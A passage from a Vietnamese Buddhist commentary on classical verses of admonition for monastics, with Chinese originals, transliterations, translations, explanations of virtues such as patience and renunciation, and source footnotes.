“Buông theo nhân duyên phiền não”: Đã biết mục tiêu cao nhất của người xuất gia, thế thì yếu đạo của việc đạt đến giải thoát là cần phải xem trọng phát tâm Bồ-đề, hành đạo Bồ-tát. Nắm bắt cơ hội nghìn năm khó gặp này, tinh tấn hành trì, lập kì hạn một ngày sớm nhất đạt thành mục đích của người xuất gia. Nếu không y giáo phụng hành, còn dùng tâm phàm phu lao theo điên đảo phan duyên, mọi việc được dẫn dắt bằng tâm tham: như muốn nương tựa vào người có của cải thế lực, tranh thủ cảm tình để được điều tốt… Thân làm người xuất gia, quả thật còn điên đào vọng tưởng như thế, quên mất mục tiêu của người xuất gia, ném việc lớn sinh tử qua một bên, thật là đáng thương! Và như thế, kết quả sẽ thế nào? Đó chính là “địa ngục A-tì ai người thay thế?”.
“A-tì ai người thay thế?”: Câu nói này vô cùng nghiêm trọng. A-tì chính là tên của địa ngục Vô Gián, địa ngục chịu khổ cùng cực. Hai chữ ‘vô gián’nghĩa là không bao giờ gián đoạn. Khi tội nhân vừa đọa vào địa ngục này thì chịu sự khổ không bao giờ gián đoạn, cho đến khi hết tội mới dừng. Đây là địa ngục dành cho người phạm tội cực nặng. Sự khổ báo mà tội nhân ở trong ngục này phải chịu là trong một ngày muôn lần chết, muôn lần sống.
Trong Tăng đoàn của chúng ta có hai câu: “Chỉ sợ không tu hành, không sợ không cúng dường”. Người xuất gia không bao giờ chết đói, người chân chính khắc khổ tu hành không những không chết đói mà tự nhiên tứ sự cúng dường đầy đủ. Ngày xưa, trên một ngọn núi thuộc vùng Đài Bắc, có một vị xuất gia không có phòng để ở, suốt ngày chỉ ở bên gốc cây chuyện niệm Phật A-di-đà. Vị ấy cũng chẳng ra ngoài hóa duyên, cũng chẳng đi đâu, cứ mãi ở bên gốc cây niệm Phật. Khoảng hai ba tháng sau có người bản xứ làm giúp vị ấy một ngôi nhà đơn giản. sau khi có nhà ở, vị ấy cũng không gián đoạn dụng công niệm Phật, không những không điên đảo phan duyên mà thậm chí ngay cả pháp hiệu cũng không nói cho mọi người biết. Tín đồ đến cúng dường bèn gọi vị ấy là “A-di-đà Phật”. Sau đó, mọi người xây chùa cho vị ấy và đặt tên là chùa A-di-đà, cũng chính là ngôi chùa hiện tọa lạc trên núi ở Đài Bắc. Chùa Di-đà trong thời gian pháp sư Tịnh An trụ trì rất thanh tịnh trang nghiêm.
Ngoài ra, còn có Hòa thượng Quảng Khâm chỉ ăn trái cây cũng là một điển hình. Ngài không ăn những món nấu nướng như người bình thường mà chỉ ăn trái cây, một lòng tu hành, chẳng phải tham thiền, chẳng phải niệm Phật. Lúc ngài mới đến Đài Loan, không có một miếng ngói, không có một tấc đất cắm dùi, nhưng hiện tại thì dù Bắc hay Nam, Ngài đều có một đạo tràng lớn. Vì thế chúng ta xuất gia tu hành chỉ cần có chỗ an trụ thì nhất định lập niệm công phu, chuyên tâm biện đạo, hoàn thành nhân cách thanh cao vĩ đại. Nếu trọn ngày ở bên ngoài bôn ba vì đời sống mà hao tổn tinh thần. Dạng người ấy dù có chút thành tựu cũng rất đáng thương. Mục đích của người tu hành chủ yếu là minh tâm kiến tính, hoàn toàn chẳng phải vì mưu cầu quyền thế, tìm cầu vật chất. Vì thế, Tổ sư đặc biệt đưa ra điều này. Chúng ta cần phải lập chỉ chớ có chạy theo bên ngoài.
- Hạnh nhẫn nhục
Chữ hán
出家要忍人辱,
忍辱天下和睦,
此章佛祖真傳,
忍辱少罪多福。
Phiên âm
Xuất gia yếu nhẫn nhân nhục
Nhẫn nhục thiên hạ hòa mục
Thử chương Phật Tổ chân truyền
Nhẫn nhục thiểu tội đa phúc.
Dịch nghĩa:
Xuất gia phải biết nhẫn nhục
Nhẫn nhục thiên hạ an hòa
Hạnh này Phật Tổ chân truyền
Nhẫn nhục tiêu tội tăng phúc.
Giảng giải:
Nhẫn nhục là một trong mười độ của Bồ-tát, là phương tiện duy nhất để đối trị sân hận phiền não. Nói một cách khái quát, trong tâm chúng ta có ba thứ phiền não căn bản rất mạnh, đó là ba độc tham, sân, si. Nó chính là tảng đá lớn chắn lối con đường Bồ-đề. Trong đó, mọi người đều biết sức tác hại của tâm tham. Học giả Tiểu thừa được chỉ dẫn tu tập Ngũ đình tâm quán. Chúng sinh tâm tham nhiều thì tu quán bất tịnh để trừ tham dục. Tâm sân cũng là một chướng ngại lớn cho người tu hành, sức phá hoại của nó hoàn toàn chẳng thua gì tâm tham. Nhân đó trong Ngũ đình tâm quán đặc biệt đưa ra pháp quán từ bi để điều phục chúng sinh nhiều sân.
Tâm si là phiền não do chẳng rõ nhân quả, không phân định được thị phi. Chúng sinh vì tâm si che mất ánh sáng của tự tâm, vì thế khó chứng đạo bồ-đề. Ngũ đình tâm quán đưa ra pháp quán Nhân duyên để điều phục tâm đa si của chúng sinh.
Từ bi nghĩa là ban vui cứu khổ. Nhẫn nhục cũng là một phương diện của từ bi, chẳng qua từ bi là mặt tích cực còn nhẫn nhục là mặt tiêu cực. Không cần phải tính toán, khi điều trái nghịch đến đều chấp nhận, những việc khó nhẫn có thể nhẫn được. Tâm luôn tha thứ khoan dung với những người chống phá; đối với người tranh đấu một cách vô lí thì chẳng mảy may để tâm, hoàn toàn đều dùng thái độ thương xót để tiếp đãi, nghĩ tìm cơ hội thích hợp để hướng họ hồi tâm hướng đạo. Đó là những biểu hiện của đức nhẫn.
Chữ “nhẫn” là một trong những công phu tu dưỡng trong truyền thống văn hóa xưa nay của người Trung Quốc. Đối liễn trong tiết Xuân có câu như thế này: “Nhất cần thiên hạ vô nan sự; bách nhẫn đường trung hữu thái hòa”. Nghĩa là người chuyên cần làm việc thì không có việc gì không thành; ở trong một gia đình mà thường nhẫn nhịn nhau thì không xảy ra xung đột tranh chấp, lúc đó trong gia đình tràn đầy không khí an hòa. Có thể thấy rằng không chỉ Phật giáo chú trọng đến nhẫn nhục mà ngay cả các bậc thánh nhân ở Trung Quốc cũng đề xướng.
Vì thế, Tổ sư muốn người xuất gia chúng ta phải dụng công thật nhiều ở phương diện này. Câu tiếp theo là nói đến điều tốt khi tu hạnh nhẫn nhục.
“Nhẫn nhục thiên hạ an hòa”: Tu hạnh nhẫn nhục khi bị người khác buông những lời bất thiện hay những hành động không đẹp, nhưng tất cả đều được chúng ta tiếp nhận một cách điềm nhiên. Như thế, dù cho đi đến đạo tràng nào đều có thể vui vẻ an hòa cùng các bạn đạo đồng tham.
“Hạnh này Phật Tổ chân truyền”: Nhẫn nhục Ba-la-mật là một pháp môn trong Lục độ, là một hạnh trọng yếu trong vạn hạnh của Bồ-tát, là pháp bảo chân truyền chính từ kim khẩu của Phật-đà tuyên dương. Chúng ta cần phải nương pháp tu hành mới không phụ từ ân của Đức Phật.
“Nhẫn nhục tiêu tội tăng phúc”: Tu hạnh nhẫn nhục còn có thể giảm nhẹ tội nghiệp và tăng trưởng phúc đức của chúng ta. Bởi vì nếu một người không cùng người khác cạnh tranh sở trường sở đoản mà luôn luôn kiểm điểm chính mình, như thế thì tự nhiên không tạo ra những tội nghiệp, và tất nhiên đã không ngừng kiểm điểm chính mình thì nhất định đức tính từ bi nhân nhượng tăng trưởng, kết nhiều duyên lành với mọi người, ở nơi nào cũng được mọi người vui đón, phúc đức cũng được tăng trưởng.
Nhân đó, chúng ta nếu muốn có bạn đồng học tốt, đồng sự tốt, quyến thuộc tốt, và tội nghiệp tiêu trừ, phúc đức tăng trưởng thì phải ý thức việc tu hạnh nhẫn nhục. Bởi vì hạnh này đúng thật là một nhân duyên trợ lực lớn để giảm tội tăng phúc.
- Hạnh xa lìa thế tục
Chữ Hán
出家要遠俗家
俗家人事如蔴
杜絕塵緣煩擾
自然別有生涯
Phiên âm
Xuất gia yếu viễn tục gia
Tục gia nhân sự như ma
Đỗ tuyệt trần duyên phiền não
Tự nhiên biệt hữu sinh nhai.
Dịch nghĩa
Xuất gia phải lìa tục gia
Tục gia công việc hà sa
Cắt đứt duyên trần phiền não
Tự nhiên đường đạo chẳng xa.
Giảng giải
“Xuất gia phải lìa tục gia”: việc này chư vị Tổ sư vô cùng xem trọng. Bởi vì chúng ta đã xuất gia thì phải chuyên tâm nhất ý tu học Phật pháp, để mong chuyển phàm thành thánh, liễu thoát sinh tử, chớ nên hai ba tâm, mãi gánh vác việc thế gian, lui tới nhà thế tục, làm đình trệ đạo nghiệp của mình. Nếu thật muốn làm việc thế tục thì cần gì phải xuất gia!
“Tục gia công việc hà sa”: công việc của người thế gian vô cùng phức tạp, nhiều như hạt mè hạt cát, chẳng thể lo hết được. Nếu người đã xuất gia, lại lao vào những việc của người tại gia thì không những gia tăng phiền não mà còn làm cho công phu tu hành bị trì hoãn. Chúng ta cần phải nhận thức rõ ràng: xuất gia tu hành đâu phải dễ vì sao lại tùy tiện lãng phí thời gian? Cần phải biết xuất gia có mấy bậc chẳng giống nhau. Hiện tại chúng ta xuất gia chỉ là bước đầu xa lìa sinh tử, ở trong giai đoạn này luyện tập một cách thành thục nếp sống của người xuất gia, xa bỏ những duyên thế tục, đó chính là kiến lập nền móng của Bồ-tát đạo; sau đó mới bắt đầu cất bước. Nghĩa là dần thăng tiến từ giai vị Thập tín, Thập trụ, Thập hạnh, Thập hồi hướng … Kì thật, không chỉ Bồ-tát ở giai vị Tam hiền mới xuất gia tu hành mà ngay cả Bồ-tát Thập địa vẫn phải xuất gia tu hành. Bởi vì xuất gia mới có thể đích thực chuyển phàm thành thánh, hoàn thành đại nguyện li tục xuất trần, cũng chỉ có xuất gia mới có thể tu học Phật pháp một cách chuyên tâm nhất trí. Nếu như không hiểu được tính chất trọng yếu của việc xuất gia mà vẫn can thiệp vào mọi việc của người tục gia thì chỉ làm ngăn ngại con đường đạo của chính mình. Có lẽ cũng có người cho rằng người xuất gia quá lo cho riêng mình, chẳng gần gũi nhân tình. Thật ra hoàn toàn ngược lại, không phải chúng ta không nghĩ đến tình thân hay bất hiếu mà đó chính là chân chính báo hiếu. Đại sư Liên Trì ở đời Minh từng nói: “Người hiếu hạnh chân chính là người có thể làm cho cha mẹ xa lìa trần cấu”. Khuyên cha mẹ học Phật, nghe pháp để rồi tu tập đồng chứng đạo Bồ-tát, như thế chúng ta đã thể hiện hạnh hiếu rồi. Dùng tài vật, thức ăn vật mặc của thế gian để cúng dường cho cha mẹ cố nhiên là rất tốt, nhưng đó chẳng qua là trợ giúp cha mẹ về phương diện vật chất trong sinh hoạt, nhưng không giúp được cho cha mẹ hướng về con đường đạo đức và có khi trở lại làm tăng thêm lòng tham luyến của cha mẹ, làm trở ngại sự hướng đạo của cha mẹ, thế thì được không bằng mất.
Vì thế, chúng ta tu hành, sợ nhất là trần duyên phiền não làm ngăn ngại. Nếu ở phương diện này có thể xa lìa một cách thích đáng, không tham dự vào việc thế tục, không đèo bồng việc thế tục, mới có thể an tâm hành đạo, mới sống được nếp sống xuất tục. Nếp sống xuất tục tức là trên cầu Phật đạo, dưới độ chúng sinh, đó là chân chính đi trên con đường lớn Bồ-tát, đó là một việc lớn mà chúng ta cần phải chú ý.
Có nhiều người không rõ lý này, đã xuất gia nhưng không quên việc thế tục, thậm chí không xét nhân quả, đem tiền của Thường trụ đưa cho cha mẹ dùng. Hành động đó, tuy được thiết lập trên căn bản của tâm hiếu, giải quyết vấn đề cho cha mẹ, nhưng việc này chỉ nên cho mượn một số ít để giải quyết công việc cấp bách, đợi đến khi cuộc sống cha mẹ khá hơn thì phải gửi lại cho Thường trụ cả vốn lẫn lời. Vì cha mẹ tục gia chẳng phải là người xuất gia, họ không có phần phúc đức để thụ hưởng tài vật của Thường trụ trong mười phương. Nếu người xuất gia riêng tư tiếp tế cho cha mẹ, thì đồng nghĩa trộm của Thường trụ, trái với tâm nguyện cúng dường Tam bảo của tín thí, chỉ tạo thêm nhân duyên đọa địa ngục cho cha mẹ mà thôi, thật là tội lỗi.
Người đã phát tâm xuất gia tốt nhất nên cắt ái từ thân, chuyên tâm nơi đạo nghiệp, thành tựu quả Phật bồ-đề, khiến cho cửu huyền thất tổ của mình đều nhờ công đức này mà sinh về nước Phật, vượt thoát luân hồi. Đó là cách báo hiếu rốt ráo của người xuất gia, chúng ta đem sức tu hành để cúng dường mẹ cha, siêu độ gia tiên. Vì thế, thâm ý của tổ sư răn nhắc chúng ta phải xa lìa nhà thế tục, không tự chuốc lấy những chuyện phiền hà. Hy vọng mọi người đều chú ý vấn đề này.
- Hạnh đoạn trừ vọng tâm.
Chữ Hán
出家要斷妄心
妄心好事難成
若依妄心行事
必有禍患臨身.
Phiên âm
Xuất gia yếu đoạn vọng tâm
Vọng tâm hảo sự nan thành
Nhược y vọng tâm hành sự
Tất hữu họa hoạn lâm thân.
Dịch nghĩa
Xuất gia phải trừ vọng tâm
Vọng tâm, việc tốt khó thành
Nếu theo vọng tâm hành sự
Ắt chuốc hoạn nạn vào thân.
Giảng giải
“Trừ vọng tâm” chính là điều căn bản cốt yếu của công phu tu hành ở người xuất gia học Phật. Căn cứ vào Khởi Tín luận nguồn tâm nhất chân pháp giới của chúng ta có hai môn khác nhau: Một là Chân như môn, hai là Sinh diệt môn. Trong đó, Sinh diệt môn chính chỉ cho tác dụng của vọng tâm, do nơi một niệm bất giác, tức Chân như chẳng giữ tự tính, vọng tâm nổi lên mà thành. Từ đó có chúng sinh lưu chuyển trong sinh tử và hiện tượng chân như huân vọng tâm. Trong Bát thức qui củ tụng thuộc hệ Duy Thức nói:
Hạo hạo tam tạng bất khả cùng
Uyên thâm thất lãng cảnh vi phong.
Duy thức gọi Chân như tự tính là A-lại-da thức, dịch là Tàng thức là tâm thức mà chứa cả chân tâm lẫn vọng tâm, bản thể của tàng thức bất động nhưng do tiền thất thức sinh khởi khi căn đối cảnh, như nhãn căn duyên sắc trần mà sinh khởi nhãn thức, nhĩ căn duyên thanh trần mà sinh khởi nhĩ thức, tỉ căn duyên hương khí mà sinh khởi tỉ thức, thiệt căn duyên vị mà sinh khởi thiệt thức… sáu căn bị sáu trần chi phối mà phan duyên không ngừng. Nó khuấy động biển tàng thức vốn bình lặng thành sóng to gió lớn, sóng gió ấy sau khi dậy lên thì bắt đầu từng làn sóng thức xô đẩy hướng về bờ sinh tử, hình thành chuổi nhân duyên gọi là vô minh duyên hành, hành duyên thức, thức duyên danh sắc, danh sắc duyên lục nhập, lục nhập duyên xúc, xúc duyên thọ, thọ duyên ái, ái duyên thủ, thủ duyên hữu, hữu duyên sinh, sinh duyên sinh diệt môn lão tử. Sinh tử của chúng ta từ đó mà ra, nhưng tu hành là ngược dòng sinh tử mà quay trở lại Chân như môn. Điều này Duy thức học gọi là chuyển tám thức thành bốn trí.
Công phu chuyển thức thành trí, trước hết là dứt diệt vọng tâm vô minh sinh tử, sau đó chúng mới thuận theo thứ lớp không còn sinh khởi. Đây là hoàn diệt môn chuyển mê thành giác, trở về với pháp giới tâm thể. Vì thế nên Tổ sư muốn chúng ta đoạn trừ vọng tâm.
“Vọng tâm việc tốt khó thành”: Đã có vọng tâm thì có tâm phân biệt, phân biệt tốt xấu, phải trái, nhân ngã…tất cả những sự nhiễu loạn, phiền não, ác nghiệp đều do tâm phân biệt mà sinh, khi đã có nhiễu loạn phiền não thì việc tốt tất nhiên chẳng thành, ác nghiệp nối nhau phát khởi.
“Nếu theo vọng tâm hành sự”: Giả như vẫn y nhiên theo vọng tâm mà hành sự thì dù đã có nghe đến Phật pháp cũng chỉ làm theo cách của riêng mình, không đề cao cảnh giác, không tự phản tỉnh một cách sâu sắc mà bị tâm tham sân si làm chủ. Những hành động được xuất phát từ tâm niệm như thế thì kết quả sẽ như thế nào, mỗi người tự nghĩ biết.
“Ắt chuốc hoạn nạn vào thân”: Thực tế trong nhân gian, mọi người đều chấp nhận làm việc bằng vọng tâm, nhân đó phát sinh rất nhiều thị phi, phiền não. Chúng ta thử nghĩ thường thì chỉ một câu nói sai lầm, xuất phát từ một chủ ý sai, hoặc do hiểu lầm thế mà trở nên thân bại danh liệt. Trong xã hội có bao nhiêu người, vốn có địa vị rất cao, gia đình mĩ mãn, nhưng do hành sự bằng vọng tâm, bị một vài phần tử có dã tâm lợi dụng mà dẫn đến gia đình tan nát, tự thân mất mát. Thế nhưng họ chẳng chịu tỉnh xét, không biết ăn năn sám hối, thật đáng thương! Ngày nay, chúng ta đã xuất gia, lại được học Phật pháp, thế thì tốt nhất là phải y pháp tu hành, phát tâm bồ-đề, trên thì tuyên dương chính pháp, dưới thì hóa độ chúng sinh. Chúng ta thấy chính phủ y theo hiến pháp ủng hộ tôn giáo phát triển, chủ trương tự do tín ngưỡng. Tổ tiên chúng ta đã để lại cho chúng ta một đất nước đẹp đẽ, vì thế mọi người cần phải nỗ lực phát huy Phật giáo, tịnh hóa xã hội, nhân tâm, khiến mọi người ngộ được chân lí Phật giáo, hướng đến quả Phật chính giác, đó mới là chính niệm mà chúng ta cần có, chính nghiệp mà chúng ta cần tu.
Lật lại trang sử, chúng ta thường thấy có những sự kiện bất hạnh xảy ra, tất cả đều do những người ấy không tự thương mình, không tự trong sạch bản thân mà chỉ mưu đồ danh lợi hư vọng nên dẫn đến gia đình tan nát, bản thân mất mát. Có thể thấy, sự phát động của vọng tâm, hậu quả không thể lường được.
Thế nên, chúng ta đã tu hành càng phải triệt để diệt trừ nó, phải luôn luôn khởi quán. Đó gọi là: “Không sợ niệm khởi, chỉ sợ giác chậm”. Quay xét niệm đầu, chính từ khởi nguyên của nó, mê vọng ngay đó dừng dứt, đó chính là tiền đề chuyển thức thành trí. Không thì chính đạo chẳng tu, vọng tâm hành sự, không những không thể chuyển thức thành trí mà họa lớn sinh tử luôn theo sát như bóng theo hình. Quí vị thấy, thật là đáng sợ!
- Hạnh phải thông đạt đạo lí
Chữ hán
出家要達道理
切切[36]只盡自己
謙和每讓三分
相見人人歡喜
Phiên âm
Xuất gia yếu đạt đạo lí
Thiết thiết chỉ tận tự kỷ
Khiêm hòa mỗi nhượng tam phân
Tương kiến nhân nhân hoan hỉ.
Dịch nghĩa
Xuất gia phải rõ đạo lí
Cung kính làm tròn bổn phận
Khiêm hòa nhân nhượng ba phần
Gặp người ai cũng vui mến.
Giảng giải:
Chúng ta làm người cần phải thông đạt đạo lí, ở đâu cũng làm tròn bổn phận của mình, đối đãi với người thì lịch lãm khiêm tốn, mới có thể hòa vui cùng người. Chúng ta từ vô thỉ đến nay do vì tâm tự tư, ngã chấp nặng nề, tích tập quá lâu ngày, luôn thấy lỗi lầm của người khác mà không hiểu được những khuyết điểm của bản thân. Một ngày kia mình phạm phải khuyết điểm, lúc bị mọi người chỉ trích thì không những tâm khí không phục mà còn cố nghĩ ra biện pháp để biện minh, thật là không có đạo lí.
Tương truyền vào thời đại thượng cổ có một vị tiên nhân chuyên quản việc thiện ác ở nhân gian. Bên mình luôn mang theo hai túi da ngựa, một túi treo ở trước đựng lỗi lầm của mình, một túi treo ở sau đựng lỗi lầm của người. Một hôm, tiên nhân uống rượu đến say nên đã treo nhầm, ông treo túi đựng lỗi lầm của người đặt ở phía trước, còn túi đựng lỗi lầm của mình ở phía sau.
Xưa nay các bậc thánh nhân chế định là đem túi đựng lỗi lầm của mình đặt ở phía trước, lỗi lầm của người đặt ở phía sau, dụng ý là phải luôn luôn kiểm điểm chính mình. Vị tiên nhân ấy say rượu nên treo đãy nhầm lẫn, vì thế bắt đầu từ lúc ấy mọi người chỉ biết những khuyết điểm của người khác, mà che dấu lỗi lầm của chính mình.
Mặc dù, đó chỉ là một câu chuyện thần thoại, nhưng nó đã nói lên được nhược điểm của tâm chúng sinh. Tổ sư muốn chúng ta lúc nào cũng phải tự cảnh tỉnh mình. Chúng ta là người xuất gia thì bất cứ việc gì cũng phải thông đạt đạo lí, tùy thuận nhân tình, y nơi lương tâm mà làm tròn bổn phận, phải làm hết sức mình không nên trốn tránh, lại càng không nên không làm; trốn tránh chỉ tăng thêm những rắc rối không cần thiết.
“Khiêm hòa nhân nhượng ba phần”: đối với mọi người phải vui hòa khiêm tốn, bất cứ việc gì cũng luôn luôn nhường người ba phần, đó là nguyên tắc căn bản của ứng xử. Giá như mọi người đều giữ được thái độ này, thì sáu phương thức hòa hợp lí tưởng của Tăng đoàn sẽ nhanh chóng ứng dụng giữa cuộc đời.
“Gặp người ai cũng vui mừng”: đã dùng lễ kính đối đãi, hai bên đều tôn trọng lẫn nhau, mỗi người đều giữ một phần lễ tiết, thì mọi người có thể đi đến cảnh giới thông tình đạt lí, và chắc chắn đoàn thể đồng tu học Phật pháp của chúng ta luôn hòa hợp, tạo nên một không khí vô cùng hoan hỉ.
- Xuất gia phải tin Phật pháp
Chữ Hán
出家要信佛法
三 藏一口吞卻
方知源遠流長
可接佛祖一脈
Phiên âm
Xuất gia yếu tín Phật pháp
Tam tạng nhất khẩu thôn khước
Phương tri nguyên viễn lưu trường
Khả tiếp Phật tổ nhất mạch.
Dịch nghĩa
Xuất gia phải tin Phật pháp
Tam tạng hãy giữ nằm lòng
Mới biết suối nguồn vô tận
Tiếp nối mạng mạch Phật pháp.
Giảng giải
Theo lí thường, người xuất gia trước phải có tín tâm với Phật pháp sau đó mới phát tâm xuất gia. Trong đây vì sao Tổ sư lại nói: “Xuất gia phải tin Phật pháp”? Tựa hồ như trước xuất gia sau đó mới tin Phật pháp. Vấn đề này cần phải nghiên cứu.
Phật giáo trong quá khứ trong khoảng thời gian từ Nam Bắc triều (420-589) đến Tùy, Đường, Tống, Minh (1368-1644), người muốn xuất gia phải thông qua thi tuyển của quốc gia, người trúng cách sẽ được cấp độ điệp và mới cho phép xuất gia. Đương nhiên lúc ấy người xuất gia có trình độ và tố chất rất cao. Đến triều Mãn Thanh lên nắm chính quyền, họ là một dân tộc khác xâm nhập, vì mục đích thống trị nên họ cho phép người xuất gia không cần tuyển xét.
Trong xã hội Trung Quốc cũ, thời ấy Phật pháp hưng thịnh, tự viện mọc lên rất nhiều. Đa phần cha mẹ đều muốn cho một hai đứa con mình xuất gia, vì thế tạo thành một thông lệ tuổi nhỏ xuất gia làm sa-di khắp nơi. Do sa-di tuổi nhỏ, nhận thức Phật pháp còn nông cạn, nên chưa đủ sức để tin hay không tin. Đó là một thực tế trong quá khứ, đồng thời đó cũng là một hạt nhân làm suy tàn Phật giáo Trung Quốc của chính phủ Mãn Thanh. Mãi đến năm đầu Dân Quốc (1912) mới có pháp sư, cư sĩ xuất hiện lo việc giáo dục Tăng chúng, khiến người xuất gia trước tiên đối với Phật pháp sinh tín tâm, sau đó thích thú tìm hiểu để rồi y theo sự hiểu biết ấy mà tu hành cầu chứng đắc. Từ đó, người xuất gia dần dần đi vào con đường học Phật một cách chân chính.
Nếu xuất gia mà không tin Phật pháp thì càng không thể hiểu rõ Phật pháp, đã không có khái niệm đối với Phật pháp thì suy nghĩ và việc làm đâu khác gì thế tục? Nông thôn, thành thị ngày xưa thường có những vị Hòa thượng ở trong các ngôi đền, miếu vì không hiểu Phật pháp nên vị thần nào họ cũng cúng, miễn có người lễ bái là được, dẫn đến đa phần tín đồ Phật giáo đều không phân biệt giữa thần và Phật. Thật là tội lỗi! Và thậm chí vì tăng gia sản xuất cho nên cả đền thờ còn nuôi heo, dê, gà, vịt… làm những việc như thế đều là hành vi mê tín của thế tục. Thử nghĩ, để những vị như thế chủ trì Phật pháp thì Phật pháp thế nào mà chẳng suy vong? Nhân đó, Tổ sư đặc biệt nhấn mạnh xuất gia phải tin Phật pháp.
“Tam tạng hãy giữ nằm lòng”: đã tin Phật pháp, sau đó phải nghiên cứu Phật pháp, nghe giảng tam tạng giáo điển kinh, luật, luận, nghiên cứu sâu vào để rồi tiêu hóa, nằm lòng ba tạng, sau đó mới y pháp tu hành, mới có thể tự giác, giác ngộ cho người khác, tự độ, độ người. Mặt khác, tam tạng nêu bày tam học giới định tuệ, đó là nền tảng tu hành Phật đạo. Chỉ có tam học tăng thượng, mới có lí sự viên dung, hoành siêu ba cõi, mãi mãi ra khỏi luân hồi, đốn ngộ Phật thừa, viên mãn đại giác.
“Mới biết suối nguồn vô tận”: Đối với lịch sử Phật pháp, bản thân là một đệ tử xuất gia trong Phật giáo, nhất định chúng ta phải hiểu rõ, sau đó mới có thể làm được cái gọi là: “Quang tiền dụ hậu[37]”. Tổ tông của chúng ta khi khai sáng ra đạo Phật trong bối cảnh mọi người tin theo thần quyền. Ngài đã tử bỏ địa vị tôn quí, đầu đội sương, chân đạp tuyết kiên trì lối sống tu hành ở trong núi rừng. Nhờ vào nghị lực kiên cường và tâm bi rộng lớn mà Ngài đã tham thấu điều bí áo của vũ trụ nhân sinh, đưa ra chân lí Phật giáo bình đẳng giải thoát, đem nhân loại ra khỏi gông xiềng của tư tưởng thần quyền, khiến chúng sinh khắp mọi nơi phát được niềm tin tưởng vào chính mình, khiến cho mọi người tin chắc mỗi một chúng sinh đều là chủ nhân của thế giới. Công lao vĩ đại ấy không phải phát xuất từ thế gian mà do tổ tông (Phật-đà) chúng ta sáng tạo. Chúng ta rất vinh hạnh được làm con cháu của bậc thầy đại trí tuệ, chúng ta không thể không có triển vọng, chúng ta cần phải phấn chấn tinh thần, làm sao quang tiền dụ hậu mới không thẹn là con cháu của Phật-đà
“Tiếp nối mạch nguồn Phật tổ”: Hương thơm của mạch nguồn Phật Tổ, chúng ta cần phải tiếp nối. Thánh nhân Trung Quốc cho rằng: “Bất hiếu hữu tam, vô hậu vi đại”. Người xuất gia chúng ta tuy không nói đến việc truyền giống tiếp nòi, nhưng tuệ mệnh Phật pháp, chúng ta nhất định phải kế tục thừa tiếp. Trách nhiệm gánh vác gia nghiệp Như Lai, kế tục tuệ mệnh của Phật chính là bản thân chúng ta – con cháu của Phật-đà. Chúng ta cần phải tận tâm với nhiệm vụ trọng yếu này, Nếu để mạch nguồn Phật pháp dứt tuyệt thì chúng ta há chẳng phải là tội nhân thiên cổ sao? Hi vọng mọi người đều là những bậc đại trượng phu, tiếp nối người đi trước, khai sáng cho kẻ bước sau, đều là Bồ-tát tiếp nối mạch nguồn Phật Tổ.
[1] Trời Lục Dục (Lục dục thiên 六欲天 ): sáu cõi trời ở Dục giới: Tứ Thiên Vương, Đao-lợi- thiên, Dạ-ma thiên, Đâu-suất thiên, Lạc Biến Hóa thiên, Tha Hóa Tự Tại thiên.
[2] Tây lai ý西來意: Còn gọi: Tây Tổ ý. Ý chỉ thiền pháp của Sơ tổ Thiền tông là Bồ-đề Đạt-ma từ Ấn Độ truyền sang Trung Quốc.
[3] Đại sư Tuệ Viễn (334~416): sơ tổ tịnh độ tông ở Trung Hoa, là người khai sáng Bạch Liên Xã ở Lô Sơn .
[4] Câu này trích trong Trung Dung: “自誠明謂之性,自明誠謂之教,誠則明矣,明則誠矣”
[5] Triệu Châu Tùng Thẩm 趙州從諗: Ngài họ Hác tên Toàn Thẩm, người vùng Hác Hương, Tào châu, tỉnh Sơn Đông. Lúc còn nhỏ ngài xuất gia ở Hỗ Thông Viên, rồi đến vùng Trì Dương tham yết với thiền sư Nam Tuyền Phổ Nguyện và được khế ngộ. Về sau ngài còn đến tham bái một vài danh tăng đương thời như Hoàng Bá, Bảo Thọ, Diêm Quang, Giáp Sơn… và sau đó thể theo thỉnh cầu của đồ chúng ngài đến trú tại Quan Âm Viện, vùng Triệu Châu, thuộc tỉnh Hà Bắc ngày nay. Nơi đây ngài đã tuyên dương thiền phong độc đáo của mình trong vòng suốt bốn mươi năm. Phần lớn những lời dạy của ngài được lưu truyền thành công án. Ngày 01 tháng 11 niên hiệu Càn Ninh thứ tư (897) đời Đường, ngài thị tịch, hưởng thọ 120 tuổi, được vua ban tặng nhụ hiệu là Chân Tế Đại Sư.
[6] Mặc tẩn 默擯 (S: brahma-daṇḍa; Cg: Diệt tẩn): phương pháp cuối cùng trị tội những Tì-kheo ác hạnh. Mặc tẩn là dịch nghĩa của từ ‘phạm đàn’, vốn được phiên âm từ từ brahma-daṇḍa. Nghĩa là cho Tì-kheo phạm tội vào trong đàn tràng để tự tu tỉnh cải đổi, những vị khác không thân cận, không tiếp xúc.
[7] Nguyên văn: tam tâm vị liễu, trích thủy nan tiêu 三心未了,滴水難消.
[8] Nguyên văn: 放開肚皮吃飯,立定腳跟做人。
[9] Nguyên văn: 愛之深,責之切
[10] Nguyên văn: Bất sĩ hạ vấn 不恥下問.
[11] Nguyên văn: Hoạt đáo lão, học đáo lão 活到老,學到 老。
[12] Nguyên văn: 吃虧就是佔 便宜。
[13] Nguyên văn: 養不教,父之過;教不嚴,師之惰
[14] Thi lễ truyền gia 詩禮傳家: kinh điển nho gia và qui tắc đạo đức được truyền qua nhiều thế hệ.
[15] Nguyên văn 有教無類: Giáo dục một cách bình đẳng, không đối xử phân biệt.
[16] Nhất cần thiên hạ vô nan sự 一勤天下無難事: Không có việc gì khó khi có sự chuyên cần.
[17] Cần năng bổ chuyết 勤能補拙: Những điều khiếm khuyết có thể được bổ túc bằng sự chuyên cần.
[18] Nhân nhất năng chi kỷ thập chi, nhân thập năng chi kỷ bách chi 人一能之,己十之,人十能之,己百之: Nếu người nổ lực một, tôi phải nổ lực mười; nếu người nổ lực mười tôi phải nổ lực một trăm.
[19] Nguyên văn: 好人是不會寂寞的
[20] Thoại đầu話頭: Thoại là lời nói, khi chưa khởi niệm muốn nói gọi là Thoại đầu.
[21] Nguyên văn: 一念之差,萬念失準
[22] Nguyên văn: 君子謀道,不謀食。
[23] Nguyên văn: vô minh thật tính tức Phật tính, huyễn hóa không thân tức pháp thân 無明實性即佛性,幼化空身即法身
[24] Nguyên văn: bất phạ niệm khởi, chỉ sợ giác trì
[25] Nguyên văn: 因地不真,則果遭迂曲
[26] Nguyên văn: 鋤 荷日當午,汗滴和下土,誰知盤中飧,粒粒皆辛苦。
[27] Nguyên văn: 莫等閒 白了少年頭,空悲切!
[28] Nguyên văn: Ninh động thiên giang thủy, mạc động đạo tâm nhân.
